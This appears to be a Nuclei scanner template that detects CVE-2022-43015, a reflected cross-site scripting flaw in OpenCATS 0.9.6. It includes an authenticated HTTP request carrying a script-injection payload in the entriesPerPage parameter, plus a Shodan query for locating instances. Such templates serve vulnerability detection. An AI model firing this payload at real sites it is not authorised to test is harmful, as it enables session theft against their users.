63 lines
2.2 KiB
YAML
63 lines
2.2 KiB
YAML
id: CVE-2022-43015
|
|
|
|
info:
|
|
name: OpenCATS 0.9.6 - Cross-Site Scripting
|
|
author: arafatansari
|
|
severity: medium
|
|
description: |
|
|
OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the entriesPerPage parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
|
remediation: |
|
|
To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses this issue.
|
|
reference:
|
|
- https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_entriesPerPage.md
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-43015
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-43015
|
|
cwe-id: CWE-79
|
|
epss-score: 0.001
|
|
epss-percentile: 0.41051
|
|
cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: opencats
|
|
product: opencats
|
|
shodan-query: title:"OpenCATS"
|
|
tags: cve,cve2022,xss,opencats,authenticated
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /index.php?m=login&a=attemptLogin HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
username={{username}}&password={{password}}
|
|
- |
|
|
GET /ajax.php?f=getPipelineJobOrder&joborderID=2&page=0&entriesPerPage=15)"></a>%20<script>alert(document.domain)</script>&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
cookie-reuse: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '<script>alert(document.domain)</script>'
|
|
- 'MySQL Query Failed'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a0047304502207672394966007155d538b9657907289d282d01156ff9ebfaa79f5fbbfede17a4022100ba3e3654c2c05ddd69f979874c9066544066318eb32b2f94c70e4be12545edae:922c64590222798bb761d5b6d8e72950
|